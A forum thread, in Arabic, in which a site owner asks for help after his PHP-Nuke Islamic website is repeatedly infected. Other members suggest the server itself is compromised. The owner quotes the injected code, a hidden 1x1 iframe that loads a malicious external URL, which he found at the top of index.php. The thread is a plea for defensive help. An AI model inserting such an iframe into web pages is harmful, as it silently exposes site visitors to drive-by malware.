النتائج 1 إلى 9 من 9

الموضوع: يا خبراء العرب موقعي الاسلامي اخترق فهل من مجيب؟

  1. يا خبراء العرب موقعي الاسلامي اخترق فهل من مجيب؟



    السلام عليكم ورحمه الله وبركاته

    اخواني العرب موقعي الاسلامي......!!!!
    حسبنا الله و نعم الوكيل.....!!!

    كدت ان اجن اخواني الكرام من موقعي الاسلامي
    المشكلة في البداية
    قمت بعمل موقع اسلامي و قمت بتركيب مجلة نيوك اصدار 7.8 و راكب عليه الباتشات الامنية
    وقمت بحماية ملف admin.php وجميع فولدرات المجلة بالاضافة الي سد ثغراتها
    اشتغل الموقع لمدة شهر ونصف تمام جدا و سريع جدا و في يوم من الايام دخلت علي الموقع
    و فوجئت بالمجلة مقلوبة البلوكات اليسري في الجانب الايمن و العكس
    و وجدت الانتي فيروس يحذرني من فيروس الموجود بالصورة

    فدخلت الي الموقع عن طريق ال ftp و حررت ملف ال index.php بال notepad ووجدت في اول الصفحة هذا الكود
    كود PHP:
    <iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe--> 
    ووجدت ان الرابط في الكود هو نفس رابط الفيروس

    قمت بحذف المجلة من فولدر puplic_html
    وقمت بوضع صفحة index.php فيها الموقع تحت التطوير
    وفوجئت بأن نفس الكود دخل الي صفحة ال index.php
    فقمت بحذف جميع المجلدات و الفولدرات من الموقع
    etc . mail . www . puplic_html . puplic_ftp . tmp . trash
    وغيرها و قمت بأنشاء مجلد puplic_html جديد وقمت برفع مجلة نيوك 8.0 بالتحديث الامني 3.3
    وبعد يومين فقط حدث نفس الكلام

    اريد مساعدة من اي شخص بارك الله فيكم

    ملاحظات
    لايوجد اعضاء بالموقع غيري

    رابط الموقع
    www.eltawheedway.com



    احترس اخي الكريم قبل الدخول تأكد انك تملك kaspersky internet secuerity محدث
    فالموقع به فيروسات خطرية










  2. يا اخواني
    مفيش حد عارف الحل ...!!!!!
    يا اخواني انا عاوز اعرف الثغرة فين
    بارك الله فيكم انا خلاص هتجنن من اللي بيحصل
    ده لو كان موقع اغاني مكنش حصل في كده ( حسبي الله و نعم الوكيل )


    يا اخوان انا كل شوية بحذف سطر الكود
    الموقع بيتظبط مفيش يوم والاقي الموقع باظ تاني والكود مضاف لوحده

    للعلم هذا ليس عيب جافا فالموقع كان شغال لمدة شهر ونصف
    ولعلمكم مكنش في زوار علشان يكون في اعضاء

    يا اخوان ساعدوني بارك الله فيكم








  3. ملاحظة مهمة

    اثناء تجولي في الموقع عن طريق ال ftp

    وجدت ملف بأسم shadow واخر بأسم passwd

    هل هذه الملفات خطيرة







  4. #4
    عضو نشيط جدا
    تاريخ التسجيل
    Nov 2005
    المشاركات
    552


    يا عزيزي
    سبق ونصحتك وقلتلك ابتعد عن مجلة النيوك واحذف كل شيئ بيتعلق فيها من موقعك
    الكلام والنصيحة هالايام من ذهب لكن للي يسمع بس





    __________________
    (لا اله الا الله عدد ما كان وعدد ما يكون وعذذ الحركات والسكون)
    موقع الاستضافة والخدمات والدعم
    http://www.arabsys.info
    http://www.arabsys.biz

    الماسنجر فقط
    info@arabsys.info

  5. #5
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    48


    غالباً يكون سيرفرك مخترق

    95% يكون الخطأ من السيرفر نفسه .. خل المستضيف يفعل لك السيف مود ويرقي برامج السيرفر

    وأنت بدورك ضع جدران نارية على المجلدات الحساسة والمهمة





    __________________
    Faris@Live.com

  6. #6
    عضو فعال جدا
    تاريخ التسجيل
    Jun 2004
    المشاركات
    2,297


    اخي الكريم القضية ليست بمجلة النيوك
    اخترقوا موقعك عن طريق شلل او اف تي بي

    لانو مهما اخترقوا المجلة وغيروا فيها ما بيقدروا يعدلوا على الملفات المرفوعه بموقعك

    كلم مستضيفك بهذا الخصوص





    __________________
    شبكة شباب سوفت للبرامج
    http://www.sh2soft.net

    قال الله تعالى: ( ومن يتق الله يجعل له مخرجاً، ويرزقه من حيث لايحتسب)

  7. #7
    عضو فعال
    تاريخ التسجيل
    Aug 2002
    المشاركات
    1,385


    غير السيرفر






  8. #8
    عضو نشيط جدا
    تاريخ التسجيل
    Jun 2003
    المشاركات
    495


    اقتباس المشاركة الأصلية كتبت بواسطة عرب سوفت
    ملاحظة مهمة

    اثناء تجولي في الموقع عن طريق ال ftp

    وجدت ملف بأسم shadow واخر بأسم passwd

    هل هذه الملفات خطيرة
    هذي ملفات السيرفر

    QUOTE=شبكة النظم]يا عزيزي
    سبق ونصحتك وقلتلك ابتعد عن مجلة النيوك واحذف كل شيئ بيتعلق فيها من موقعك
    الكلام والنصيحة هالايام من ذهب لكن للي يسمع بس
    [/QUOTE]

    اذا كان قصدك على اختراق النيوك .. فلو تابع اخر الاصدارت وعمل الحماية لملف الأدمن
    ماراح يشو فاي اختراق

    ولكن الاختراق اللي نتكلم عنه كان عن طريق السيرفر :court:





    __________________
    :: للمراسلة ::
    sala101[]hotmail.com

  9. #9
    عضو نشيط
    تاريخ التسجيل
    May 2004
    المشاركات
    210


    دخلت الموقع .. ولم أشاهد أي مشكلة..


    وأنا مع الإخوة أن المشكلة من السيرفر نفسه..










ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض